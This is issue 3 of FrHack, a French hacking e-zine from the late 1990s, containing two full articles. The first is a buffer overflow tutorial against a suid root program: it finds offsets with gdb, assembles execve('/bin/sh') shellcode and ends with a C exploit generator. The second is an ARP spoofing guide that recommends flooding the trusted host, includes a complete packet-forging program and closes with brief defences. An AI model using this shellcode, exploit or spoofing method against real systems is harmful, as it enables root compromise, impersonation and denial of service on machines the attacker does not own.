FRHACK # 3

      _________       ________                                                                   
     (_________))    (________))                                                                      
    (___________)) (_____))  (_))                                                                        
   (_____))____   (_____))__(_))  ___                       ___                                     
  (___________)) (__________))   (___)                     (___)                                         
  (_____))       (_____))  (_))  (___)___  _______  ______ (___)___                                                          
  (_____))       (_____))  (_))  (_______)(_______)(  ____)(_______)                                                      
  (_____))       (_____))  (_))  (___) (_)(___)(__)( (____ (___()__)                                                
  (_____))       (_____))  (_))  (___) (_)(_______)(______)(___) (_)                                                       
                                                           _                              
_____      ___  ___    _____    ______        ____    __ (_)  ____                                  
(   __)    (  _)(_  )  (  _  )  (   ___)      (  _ )  (  )    |__  |                   
) (__  __  )( \/ ) )  ) (_) (   ) (    __     )( (_)  )(      __| |
(   __)(__)(  )  (  ) ( (---) ) (   )  ) _)   (  ) (_)(  )    |__  | 
 ) (__      )(    )(   )(   )(   ) (__( )      )(   ( ))(      __| |                
(_____)    (__)  (__) (__) (__) (_______)     (__)   (___)    |____|                                

Members.xoom.com/frmag                                     Irc: Undernet #hack.fr
Http://come.to/frhack
Et www.frhack.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Disclamer
  

L'quipe de FrHack offre  votre disponibilit un Emag. Ce Emag n'a pour but que d'informer, 
donc nous ne sommes nullement responsables des pertes de donnes informatiques que ces 
informations pourraient occasionnellement causer, bien ou mal utilises.

Vous introduire sans autorisation dans un autre systme informatique, changer de quelques 
manires que ce soit les fichiers que le systme contient, est totalement illgal, que vous le 
fassiez consciemment ou non. Bien sr les textes compris dans ce Emag peuvent vous montrer 
 rentrer sur un ordinateur, mais vous devez vous servir de ces textes que pour vous amusez, et 
combler votre soif de savoir jusqu'au prochain Emag.

galement, aucun des rdacteurs de FrHack ne peut tre blmer des dommages causs, 
accidentellement ou non,  un ordinateur grce  son article.  

De plus, FrHack s'engage  vous fournir le moins possible d'informations errones. Si vous 
trouvez une informations errones dans les textes qui suivent ce disclamer, dites-vous que 
l'erreur est humaine, et veuillez nous faire part de cette information fausse.

Le contenu de ce Emag n'est pas dcern aux personnes suivantes. Personne travaillant pour le 
gouvernement, policier, personne travaillant pour un partie politique ou une agence 
gouvernementale .

En continuant  lire ce Emag, vous agrez entierement  tout ce qui a t nonc ci-dessus et 
vous vous engagez  ne pas utiliser les informations contenues dans ce Emag de quelque 
maniere que ce soit ou qui pourrait entrer en conflit avec la loi.

L'quipe de FrHack vous souhaite une bonne lecture, et espre que vous apprcierez notre 
Emag.



      L'quipe de FrHack


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Sommaire


Article                                         Auteur
Buffer Overflow                                 Klog
Spoofing ARP                                    Bubble
ISDN                                            Snowcrach
Hayes et Us Robotic                             Oktober
Exploit Sendmail                                ASHMEU
Fragment de paquet TCP                          Snowcrach
Piratage de Shell                               Khanabyss
RIP                                             oktober
Fonctionnement d'Internet                       Bismuth
TCP/IP                                          Kthulu
Slogan                                          Hack.fr
Iframe                                          Cub1c
Dynamite                                        _Franck
Therme rgulier d'internet                      Gabber
Bug dmon Imap                                  ASHMEU
Dlires sur Internet                            |Pr0teK|
Hack your fac			                  Fedaikin

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Introduction

Dans ce Emag, vous verrez beaucoup d'articles parlant de propos tel les protocoles internet. 
Mais quest-ce que ceci viens faire dans un Emag consacrer au hacking? Je vais vous rpondre 
par un petit exemple fort simple. Que ferait un mcanicien si il ne savait pas comment 
fonctionne une automobile ? Que ferait un hacker si il ne savait pas comment Internet 
fonctionne?

? Message d'intrt public

Le message suivant relve de mes convictions, de mes penses sur l'tat actuel d'internet.

Internet, dans sa base, est un outils pdagogique, il permet l'accs en quelques instants  une 
base monumentale de donnes.  Le problme est que dans tout son volution, le net est devenu 
une machine  faire de l'argent, plus rien de gratuit, la merde quoi...  C'est pourquoi, aujourd'hui, 
je vous demande quelques petites actions a entreprendre :

- Supportez les projets comme www.eu.org (ils donnent des domain names gratuits) 
 	pour www.ml.org , il est trop tard, ils ont du fermer, faute de support
- Ne cliquez JAMAIS sur des bannires de pub
- Ne souscrivez pas  des bannires de pub, pour faire de l'argent
- Optez pour des services gratuits, shell gratuits par exemple, et logiciels 	gratuit - Read : 
LINUX!
- Ne faites jamais d'changes commerciaux sur le net, svp! :-) d'ailleurs, vous   tes bien placs 
pour voir que rien n'est scure sur internet
- L'informatique doit tre utilis  des fins pdagogique, dtruisez le matriel pornographique 
lorsque vous le voyez, pensez qu'il y a de jeunes enfants qui surf aussi.

Voil, la liste pourrait tre longue, mais c'est parce que le net est devenu ainsi qu'il nous faut 
agir...  Je suis  la recherche de personnes voulant partir une campagne contre ce genre de 
choses, un peu comme celle du blue ribbon pour la libert d'expression. oktober@beer.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Buffer Overflow
 
L'exploitation du SUID par l'Homme 
par klog, Promisc Security, Inc.

Dans le but d'expliquer ce qui est, de toute faon, devenu
chose commune chez les script kids.



INTRODUCTION
~~~~~~~~~~~~

Avant de dbuter, il serait ncessaire de comprendre en quoi consiste un 
buffer overflow. tant donner que je m'attends de vous a avoir certaines 
connaissances en C ainsi qu'en assembleur, je ne m'attarderai pas sur ce 
point. Lors de l'appel d'une procedure, le processeur sauvegarde d'abord le 
contenu actuel de %eip dans la stack du programme. Or, la stack ne contient 
pas _seulement_ que ces positions sauvegardes, mais aussi tout buffer alloue 
dynamiquement, ce qui signifie toute variable dclare a l'intrieur d'une 
procdure, ou toute variable servant d'argument a une procdure. Voici un 
bref exemple de ceci: 


	proc(char *buf2, char *buf1)
	{
		char buf3[10];	
		...			<--- breakpoint
	}

	main()
	{
		char buf0[4];
		...
		proc("pro", "misc"); 
	}
	
	
	STACK: [...             [buf3][%eip][buf2][buf1][buf0]...]


Suivant ce principe, nous serons vite intress a overwriter %eip sauvegarde 
dans la stack afin de faire excuter au processeur notre code arbitraire.  La 
question est _comment_ overwriter l'image d'%eip.  Hors, nous savons qu'en C, 
certaines fonctions peuvent crire dans un buffer et, si l'on lui ordonne 
d'crire un string plus grosse que le buffer destination, elle le fera 
au-del des limites du buffer.  On inclue parmi ces fonctions gets(), 
sprintf(), strcpy(), strcat(), ainsi que des fonctions juges "plus scures" 
telles que snprintf() ou bopcy(), si celles-ci sont mal utilises.  De plus, 
toute fonction de libc (ou toute autre librairie) faisant appel a de telles 
fonctions sont, elles aussi, contamines par la vulnrabilit, par exemple 
certaines vieilles versions de syslog().  Il serait aussi utile de surveiller 
toute assignation faite a des pointeurs, surtout lorsque celles-ci sont 
itratives, ou pire, rcursives.  

Pour rsumer, l'exploitation d'un buffer overflow consiste en une opration 
d'une grande prcision ou l'on tente d'overwriter l'image de %eip sauvegarde 
dans la stack, en tentant d'obliger une function vulnrable a crire au-del 
des limites d'un buffer loge dans le stack segment.  Voici donc une 
illustration de chacune des crations de buffer dans la stack de l'exemple 
prcedent, ainsi que la string qui servira a overwriter %eip si nous 
considrons que nous la copierons en exploitant, par exemple, strcpy(buf3, 
string):


	  BUF0:                      	   XXXX		
	  BUF1:                        XXXX   			
	  BUF2:                    XXXX    			
	   EIP:           [old_eip]
	  BUF3: XXXXXXXXXX				

	STRING: XXXXXXXXXX[new_eip]



L'EXPLOITATION
~~~~~~~~~~~~~~

Maintenant que nous avons pris connaissance de certains elements 
essentiels, il serait bien de mettre sur pied un plan d'attaque. Ainsi, nous 
savons qu'il est possible d'executer arbitrairement un quelconque code en 
overwritant %eip. La question est maintenant de savoir ou sera positionner ce 
code. En effet, il faut tenir compte du fait que nous sommes dans un 
environnement protger, ou la virtual memory est utilise. Cela nous oblige 
donc a include le code a excuter a l'intrieur mme des segments du processus 
vulnrable (qui, tant suid, devient une proprit du root lors de son 
excution), sans quoi une faute de protection ou de segmentation se produira. 
C'est d'ailleurs pour cette raison que nous placerons notre code a l'intrieur 
mme du buffer. Voici une nouvelle reprsentation de la string de l'overflow:


 	STRING: [NOPs][code arbitraire][new_eip]


Maintenant que nous savons en quoi consiste la string que nous allons 
utiliser, il serait temps de trouver quelques adresses qui nous seront 
ncessaires pour le bon fonctionnement de l'opration:

	1) l'adresse du buffer a overflower;
	2) la position de l'image de %eip.

C'est ici que vous devrez sortir le meilleur ami de l'homme: gdb. 
Supposons d'abord que le programme suivant soit suid root et que nous 
dsirions l'exploiter...


	iff% cat > suid.c
	main(int argc, char *argv[]) 
	{ 
		char buffer[1024]; 
		strcpy(buffer, argv[1]); 
	} 
	^C
	iff% gcc -static suid.c -o suid
	iff% gdb suid
	[...]
	(gdb) disassemble main
	Dump of assembler code for function main:
	0x10c0 <main>:  	pushl  %ebp
	0x10c1 <main+1>:        movl   %esp,%ebp
	0x10c3 <main+3>:        subl   $0x400,%esp
	0x10c9 <main+9>:        call   0x1164 <__main>
	0x10ce <main+14>:       movl   0xc(%ebp),%eax
	0x10d1 <main+17>:       addl   $0x4,%eax
	0x10d4 <main+20>:       movl   (%eax),%edx
	0x10d6 <main+22>:       pushl  %edx
	0x10d7 <main+23>:       leal   0xfffffc00(%ebp),%eax
	0x10dd <main+29>:       pushl  %eax
	0x10de <main+30>:       call   0x1238 <strcpy>
	0x10e3 <main+35>:       addl   $0x8,%esp
	0x10e6 <main+38>:       leave
	0x10e7 <main+39>:       ret
	End of assembler dump.


Nous observons ici que l'adresse de "buffer", tant place dans la stack en 
dernier lieu (puisque "buffer" est le premier argument de strcpy()), sera 
ncessairement contenue dans le registre %eax, tel que le dmontre "pushl 
%eax" a l'adresse 0x10dd. Ainsi, nous pourrons rcuprer l'adresse de "buffer" 
en rcuprant le contenu de %eax juste avant l'appel de strcpy().


	(gdb) break *0x10de
	Breakpoint 1 at 0x10de
	(gdb) run
	Starting program: /usr/home/mbuf/dev/suid

	Breakpoint 1, 0x10de in main ()
	(gdb) info registers
	eax            0xefbfd91c       -272639716
	ecx            0xefbfdd40       -272638656
	edx            0x0      0
	ebx            0xefbfdd3c       -272638660
	esp            0xefbfd914       0xefbfd914
	ebp            0xefbfdd1c       0xefbfdd1c
	esi            0xefbfdd97       -272638569
	edi            0x0      0
	eip            0x10de   0x10de
	eflags         0x286    646
	cs             0x1f     31
	ss             0x27     39
	ds             0x27     39
	es             0x27     39
	(gdb)


Bingo. On s'aperoit ici que l'adresse de "buffer" est 0xefbfd91c. 
Maintenant, il nous faut trouver l'adresse du contenu de %eip sauvegarde avant 
l'appel de main(). Pour faire une telle chose, la technique la plus sre est 
sans doute le brute-forcing. Nous tenterons donc d'essayer d'overwriter %eip  
avec exactitude et d'obtenir la distance exacte entre le dbut du buffer a 
overflower et la position de %eip.


	iff% gdb suid
	[...]
	(gdb) run `perl -e "printf('A'x1032)";echo BBBB`
	Starting program: /usr/home/mbuf/tmp/huhu [...]
  
	Program received signal SIGSEGV, Segmentation fault.
	0x41414141 in ?? ()
	(gdb) bt
	#0  0x41414141 in ?? ()
	(gdb) run `perl -e "printf('A'x1028)";echo BBBB`
	The program being debugged has been started already.
	Start it from the beginning? (y or n) y
	Starting program: /usr/home/mbuf/tmp/huhu [...]

	Program received signal SIGSEGV, Segmentation fault.
	0x42424242 in ?? ()
	(gdb) bt
	#0  0x42424242 in ?? ()
	#1  0x0 in ?? ()
	(gdb)


Bingo. Nous savons maintenant qu'en utilisant un offset de 1028 par rapport 
a la position initiale du buffer (0xefbfd91c), "BBBB" ('B'==0x42) overwrite 
parfaitement %eip. On pouvait s'y attendre, puisque "buffer" n'est spar de 
l'image de %eip que par l'image de %ebp (registre de 32 bits, 4 bytes), et que 
"buffer" a une taille de 1024 bytes.



LE SHELLCODE
~~~~~~~~~~~~

Maintenant, il est temps de passer aux choses srieuses. Nous devons crire le 
shellcode, soit le code que nous excuterons arbitrairement. Pour ce faire, 
nous allons d'abord crire le code en C pour ensuite le dsassembler...


	iff% cat > code.c
	main()
	{
		char *cmd[] = {"/bin/sh",0};
		execve("/bin/sh", cmd, 0);
	}
	^C
	iff% gcc -static code.c -o code
	iff% ./code
	$ exit
	iff% gdb code
	[...]
	(gdb) disassemble main
	Dump of assembler code for function main:
	0x10c8 <main>:  	pushl  %ebp
	0x10c9 <main+1>:        movl   %esp,%ebp
	0x10cb <main+3>:        subl   $0x8,%esp
	0x10ce <main+6>:        call   0x1174 <__main>
	0x10d3 <main+11>:       leal   0xfffffff8(%ebp),%eax	
	0x10d6 <main+14>:       movl   $0x10c0,0xfffffff8(%ebp)
	0x10dd <main+21>:       movl   $0x0,0xfffffffc(%ebp)
	0x10e4 <main+28>:       pushl  $0x0
	0x10e6 <main+30>:       leal   0xfffffff8(%ebp),%eax
	0x10e9 <main+33>:       pushl  %eax
	0x10ea <main+34>:       pushl  $0x10c0
	0x10ef <main+39>:       call   0x1218 <execve>
	0x10f4 <main+44>:       addl   $0xc,%esp
	0x10f7 <main+47>:       leave
	0x10f8 <main+48>:       ret
	End of assembler dump.
	(gdb) disassemble execve
	Dump of assembler code for function execve:
	0x1218 <execve>:        leal   0x3b,%eax
	0x121e <execve+6>:      lcall  0x7,0x0
	0x1225 <execve+13>:     jb     0x1210 <atexit+112>
	0x1227 <execve+15>:     ret
	(gdb)


On voit ici une grande partie du code que nous dsirons inclure dans notre 
shellcode.  Comme vous auriez pu le deviner, de nombreuses modifications 
devront tre portes avant que celui-ci ne soit utilisable.  Voici en fait les 
quelques instructions ncessaires au bon fonctionnement du shellcode:


	movl   [shell],0xfffffff8(%ebp)		7 bytes
	movl   $0x0,0xfffffffc(%ebp)	 	7 bytes
	pushl  $0x0				2 bytes
	leal   0xfffffff8(%ebp),%eax		3 bytes
	pushl  %eax				1 byte
	pushl  [shell]				5 bytes
	leal   0x3b,%eax			6 bytes
	lcall  0x7,0x0				7 bytes
	"/bin/sh"


Maintenant que nous avons trouve les instructions a placer dans le shellcode, 
il nous reste a trouver les adresses de "/bin/sh" (shell). Or, si l'on dcide 
d'crire d'abord notre shellcode pour le faire suivre par "/bin/sh", il est 
trivial de calculer la position exacte de "/bin/sh" dans le buffer, tant 
donner que nous connaissons dj la position du buffer en mmoire. Cependant, 
nous ne dsirons pas rfrer a "/bin/sh" de faon statique dans notre shellcode. 
Pourquoi? tout simplement parce que si on dsire placer le shellcode dans un 
autre buffer que celui a overflower, nous devrons aussi _recrire_ le 
shellcode en entier. C'est pourquoi, lorsque l'on dsire faire appel a la 
string "/bin/sh", nous utiliserons une technique simple mais efficace de 
wrapping:


	jmp    [call addr]
	popl   %ebx
        movl   %ebx,0xfffffff8(%ebp)            
        movl   $0x0,0xfffffffc(%ebp)            7 bytes
        pushl  $0x0                             2 bytes
        leal   0xfffffff8(%ebp),%eax            3 bytes
        pushl  %eax                             1 byte
        pushl  %ebx                             
        leal   0x3b,%eax                        6 bytes
        lcall  0x7,0x0                          7 bytes
	call   [popl addr]
	"/bin/sh"


Et voil. Sachant que les instructions jmp et call peuvent prendre comme 
operands des adresses relatives et que lorsqu'un call est effectuer, 
l'adresse de l'instruction suivante est place dans la stack (l'image de 
%eip), nous pourrons retrouver l'adresse de "/bin/sh" en la retirant de la 
stack et en la plaant dans un registre non utilis (%ebx).

Pour trouver les adresses relatives (offset) de popl et call, nous devrons 
d'abord trouver la taille de chacune des nouvelles instructions que nous avons 
insrs:


	iff% cat > wrapper.c
	main()
	{
        	__asm__("
  	             	        jmp     37
        	                popl    %ebx
				movl    %ebx,0xfffffff8(%ebp)
				pushl   %ebx
       		                call    -36
                	");
	}
	^C
	iff% gdb wrapper
	[...]
	(gdb) disassemble main
	Dump of assembler code for function main:
	0x10c0 <main>:  	pushl  %ebp
	0x10c1 <main+1>:        movl   %esp,%ebp
	0x10c3 <main+3>:        call   0x1154 <__main>
	0x10c8 <main+8>:        jmp    0x10ef <__do_global_dtors+15>
	0x10ca <main+10>:       popl   %ebx
	0x10cb <main+11>:       movl   %ebx,0xfffffff8(%ebp)
	0x10ce <main+14>:       pushl  %ebx
	0x10cf <main+15>:       call   0x10b0 <dlsym+24>
	0x10d4 <main+20>:       leave
	0x10d5 <main+21>:       ret
	(gdb)


Parfait, voici donc avec exactitude le nouveau code que nous dsirons avoir 
dans notre shellcode:


        jmp    31				2 bytes
        popl   %ebx				1 byte
        movl   %ebx,0xfffffff8(%ebp)		3 bytes
        movl   $0x0,0xfffffffc(%ebp)            7 bytes
        pushl  $0x0                             2 bytes
        leal   0xfffffff8(%ebp),%eax            3 bytes
        pushl  %eax                             1 byte
        pushl  %ebx				1 byte
        leal   0x3b,%eax                        6 bytes
        lcall  0x7,0x0                          7 bytes
        call   -36				5 bytes
        "/bin/sh"


Voil! Il est maintenant temps de rcrire notre wrapper, puis de trouver les 
opcodes associes a chacune des instructions que nous dsirons utiliser. Pour 
des raisons que je ne connais trop, "lcall" n'a pas des operands valides tel 
que dmontr dans l'exemple ci haut. C'est pourquoi nous trouverons les 
opcodes de toutes les instructions en crivant ces dernires dans un inline 
__asm__, alors que nous trouverons lcall en dsassemblant execve():


	iff% cat > asmcode.c
	main()
	{
	        __asm__("
	                        jmp    31
	                        popl   %ebx
	                        movl   %ebx,0xfffffff8(%ebp)
	                        movl   $0x0,0xfffffffc(%ebp)
	                        pushl  $0x0
	                        leal   0xfffffff8(%ebp),%eax
	                        pushl  %eax
	                        pushl  %ebx
	                        leal   0x3b,%eax
	                        call   -31
	        ");
		execve("", 0, 0);
	}
	iff% gcc -static asmcode.c -o asmcode
	iff% gdb asmcode
	[...]
	(gdb) disassemble main
	Dump of assembler code for function main:
	0x10c4 <main>:  	pushl  %ebp
	0x10c5 <main+1>:        movl   %esp,%ebp
	0x10c7 <main+3>:        call   0x1174 <__main>
	0x10cc <main+8>:        jmp    0x10ed <main+41>   # = <main+34>+7
	0x10ce <main+10>:       popl   %ebx
	0x10cf <main+11>:       movl   %ebx,0xfffffff8(%ebp)
	0x10d2 <main+14>:       movl   $0x0,0xfffffffc(%ebp)
	0x10d9 <main+21>:       pushl  $0x0
	0x10db <main+23>:       leal   0xfffffff8(%ebp),%eax
	0x10de <main+26>:       pushl  %eax
	0x10df <main+27>:       pushl  %ebx
	0x10e0 <main+28>:       leal   0x3b,%eax
	0x10e6 <main+34>:       call   0x10c7 <main+3>	  # = <main+10>-7
	0x10eb <main+39>:       pushl  $0x0
	0x10ed <main+41>:       pushl  $0x0
	0x10ef <main+43>:       pushl  $0x10c0
	0x10f4 <main+48>:       call   0x1218 <execve>
	0x10f9 <main+53>:       addl   $0xc,%esp
	0x10fc <main+56>:       leave
	0x10fd <main+57>:       ret
	(gdb) x/31xb 0x10cc
	0x10cc <main+8>:        0xeb    0x1f    0x5b    0x89    0x5d    
	0xf8    0xc7    0x45
	0x10d4 <main+16>:       0xfc    0x00    0x00    0x00    0x00    
	0x6a    0x00    0x8d
	0x10dc <main+24>:       0x45    0xf8    0x50    0x53    0x8d    
	0x05    0x3b    0x00
	0x10e4 <main+32>:       0x00    0x00    0xe8    0xdc    0xff    
	0xff    0xff  	
	(gdb) disassemble execve
	Dump of assembler code for function execve:
	0x1218 <execve>:        leal   0x3b,%eax
	0x121e <execve+6>:      lcall  0x7,0x0
	0x1225 <execve+13>:     jb     0x1210 <atexit+112>
	0x1227 <execve+15>:     ret
	(gdb) x/13xb 0x1218
	0x1218 <execve>:        0x8d    0x05    0x3b    0x00    0x00    
	0x00    0x9a    0x00
	0x1220 <execve+8>:      0x00    0x00    0x00    0x07    0x00
	(gdb)


Et voil. Voici a quoi va ressembler notre shellcode complet:


        0xeb    0x1f    0x5b    0x89    0x5d
        0xf8    0xc7    0x45
        0xfc    0x00    0x00    0x00    0x00	<--- main
        0x6a    0x00    0x8d
        0x45    0xf8    0x50    0x53    0x8d
        0x05    0x3b    0x00
        0x00    0x00    

        0x8d    0x05    0x3b    0x00    0x00
        0x00    0x9a    0x00			<--- execve
        0x00    0x00    0x00    0x07    0x00

	0xe8    0xdc    0xff			<--- call [popl]
        0xff    0xff

        "/bin/sh"				<--- shell


Hum. On aperoit un autre problme ici. Le shellcode semble parfait _mais_ il 
ne pourra jamais tre copier en entier via une fonction comme strcpy(). 
Pourquoi? tout simplement a cause des 0x00, qui seront considrs comme une 
fin de string. C'est pourquoi deux solutions s'offrent a nous. La premire 
serait d'utiliser un registre clear a la place d'utiliser $0x00 dans chaque 
cas ncessaire. La seconde serait d'insrer le shellcode ailleurs que dans le 
buffer cible, ce qui serait la aussi une solution trs viable (la placer en 
argv[X] ou autre). 



L'EXPLOIT
~~~~~~~~~

Pour l'exemple d'exploit fournit ici, je ferai abstraction de ce problme pour 
laisser au codeur le choix de sa technique. Cela vitera, de plus, que cet 
article soit utilise aveuglement pour fournir aux script kids une facon simple 
d'crire leurs propres exploits. Voici donc a quoi ressemblerait un exploit 
pour un buffer overflow cree par une fonction telle bcopy() (ce qui est trs 
rare, tant donner la possibilit le limiter la taille des donnes copies 
qu'offre bcopy()):


	#define OFFSET	1028

	char shellcode[] = 
		"\xeb\x1f\x5b\x89\x5d\xf8\xc7\x45\xfc\x00\x00"
		"\x00\x00\x6a\x00\x8d\x45\xf8\x50\x53\x8d\x05"
		"\x3b\x00\x00\x00\x8d\x05\x3b\x00\x00\x00\x9a"
		"\x00\x00\x00\x00\x07\x00\xe8\xdc\xff\xff\xff"
        	"/bin/sh";

	main(int argc, char *argv[])
	{
		char string[OFFSET+4];
		int i, j;

		/* copie les NOPs */
                for(i=0;i<(OFFSET-sizeof(shellcode));i++)
                        string[i] = 0x90;

		/* copie le shellcode */
		for(i=i,j=0;i<OFFSET;i++,j++)
			string[i] = shellcode[j];

		/* Buffer Addr = 0xefbfdd1c */
		string[i++] = 0x1c;
		string[i++] = 0xdd;
		string[i++] = 0xbf;
		string[i++] = 0xef;
		
		for(i=0;i<sizeof(string);i++)
			printf("%c", string[i]);
	}



CONCLUSION
~~~~~~~~~~

Comme je l'ai mentionne plus haut (l'ai-je fait?) cet article n'a qu'une 
valeur thorique. En ralit, crire un buffer overflow est extrmement plus 
simple, tant donner que de nombreux shellcodes ont dj t crits pour de 
nombreuses architectures diffrentes. De plus, je ne vous assure aucunement 
que l'exploit prsent en exemple marche. Par contre, une chose est sr, 
c'est qu'il reflte bel et bien le fonctionnement d'un buffer overflow 
typique, tel que dcrit tout au long de cet article.

Sur ce, je vous souhaite bonne chance dans votre chasse aux bugs, en 
souhaitant que vous ayez eu le courage de lire l'article en entier. A la 
prochaine...

Collaborateur de FrHack
					klog


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Spoofing ARP

Le spoofing ARP est un type de spoofing trs simple  mettre en oeuvre. Sa puissance vient du 
fait qu'il
permettra d'obtenir une connection TCP active (blind spoofing). Il repose sur la couche 2 du 
mode OSI (liaison).
Sa faiblesse est qu'il ne peut s'appliquer qu' des rseaux locaux du fait mme du protocole 
ARP. Dans cette article je
vais expliquer comment raliser un spoof grce  ARP et aussi les moyen pour lutter contre ce 
type d'attaque.

I/ Quelques notion essentiels
Avant de rentrer dans le vif du sujet il faut comprendre comment fonctionne le protocole ARP. 
ARP veut dire Address
Resolution Protocol. Ce protocole sert  faire la correspondance entre l'adresse IP d'une 
interface et son adresse
physique(MAC). Le dialogue entre deux machine d'un rseaux local ressemble  peu prs  ce 
qui est dcrit ci-dessous:
  A(123.124.125.126) veut se connecter au serveur B(123.124.125.99)
  A envoie une requete ARP  destination de tous les htes du rseau pour obtenir l'adresse 
MAC de B.
    La requete est du type: Est ce que celui qui  telle adresse IP(123.124.125.99) peut 
m'envoyer son adresse MAC ?
  B voit qu'il est directement concern et il envoi une reponse ARP  A du type: Mon adresse 
MAC est AA:12:CB:35:EF:54

Voila, maintenant vous savez  peu prs comment sa marche. Si vous voulez en savoir plus 
achetez la bible d'Internet.

II/ Passons au chose srieuses
Pour pouvoir raliser un spoof ARP il faut avoir un accs root. La manipulation est trs simple.
 Il faut tout d'abord dterminer quels machines ont une relation de confiance, par exemple
 une machine peut exporter son home directorie  uneautre machine
(showmount -e <IP de la machine>), ou autoriser les connection au moyen des R-
commandes(rusers -al).
Une fois les machines trouvs, on sait pour qui on doit se faire passer.
Exemple: On est sur la machine C et on a dcouvert que B fait confiance  A, il faut donc se 
faire passer pour A.

Premire chose  faire mettre en vrac la machine de confiance(A):
	Il faut lancer une attaque par refus de service, du type flood, syn_flood, land.c,...
	Cette tape n'est pas vraiment ncessaire mais c'est mieux.
Deuxime chose  faire configurer son PC:
	ifconfig eth0 <adresse IP de la machine  spoofer(A)>
Troisimement il faut dsactiver ARP:
	ifconfig -arp	
Quatrimement il faut envoyer une fausse rponse ARP  la machine  spoofer(B):
	Pour ce faire nous utiliserons un programme donn ci-dessous

Voila,  partir de ce moment B sera convaincu qu'il communique avec A.

Le problme est que les cache ARP s'efface assez rapidement,  peu prs toutes les 30 
secondes. Il faudra donc envoyer
une rponse ARP toutes les 25 secondes. On pourra faire a automatiquement en utilisant les 
crontabs.


/* send_arp.c
This program sends out one ARP packet with source/target IP and Ethernet
hardware addresses suuplied by the user.  It compiles and works on Linux
and will probably work on any Unix that has SOCK_PACKET.The idea behind this program is a 
proof of a concept, 
nothing more.  It comes as is, no warranty.  However, you're allowed to use it under one
condition: you must use your brain simultaneously.  If this condition is not met, you shall forget 
about this 
program and go RTFM immediately. yuri volobuev'97 volobuev@t1.chem.umn.edu */

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define DEFAULT_DEVICE "eth0"
char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\tusage: send_arp 
src_ip_addr 
src_hw_addr targ_ip_addr tar_hw_addr\n\n"};

struct arp_packet {
        u_char targ_hw_addr[ETH_HW_ADDR_LEN];
        u_char src_hw_addr[ETH_HW_ADDR_LEN];
        u_short frame_type;
        u_short hw_type;
        u_short prot_type;
        u_char hw_addr_size;
        u_char prot_addr_size;
        u_short op;
        u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
        u_char sndr_ip_addr[IP_ADDR_LEN];
        u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
        u_char rcpt_ip_addr[IP_ADDR_LEN];
        u_char padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv)
{
struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
        perror("socket");
        exit(1);
        }

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
        perror("sendto");
        exit(1);
        }
exit(0);
}

void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}


void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
        if( (hostp = gethostbyname(str)))
                bcopy(hostp->h_addr,in_addr,hostp->h_length);
        else {
                fprintf(stderr,"send_arp: unknown host %s\n",str);
                exit(1);
                }
        }
}

void get_hw_addr(char* buf,char* str){

int i;
char c,val;

for(i=0;i<ETH_HW_ADDR_LEN;i++){
        if( !(c = tolower(*str++))) die("Invalid hardware address");
        if(isdigit(c)) val = c-'0';
        else if(c >= 'a' && c <= 'f') val = c-'a'+10;
        else die("Invalid hardware address");

        *buf = val << 4;
        if( !(c = tolower(*str++))) die("Invalid hardware address");
        if(isdigit(c)) val = c-'0';
        else if(c >= 'a' && c <= 'f') val = c-'a'+10;
        else die("Invalid hardware address");

        *buf++ |= val;

        if(*str == ':')str++;
        }
}


III/ Comment se protger du spoof ARP
Il existe une mthode trs simple pour pouvoir se prmunir du spoofing ARP, il suffit 
d'enregistrer de manire statique
les adresse MAC des cartes rseaux. Une autre mthode pour se prmunir, essentiellement si 
l'on se trouve dans un rseau
htrogne est d'utiliser le programme ARPWATCH. Cette utilitaire vous informe par email ds 
qu'une adresse IP change
d'adresse MAC. On peut tlcharger ARPWATCH  
http://ftp.su.se/pub/security/tools/audit/arpwatch/arpwatch-1.7.tar.gz

P.S: Il se peut que ca ne marche pas sur tout les ordis. #include <linux/in.h en est la cause, 
si il y as une erreur en compilant, crivez ceci  la place : // #include  <linux/in.h>

The FrHack Crew
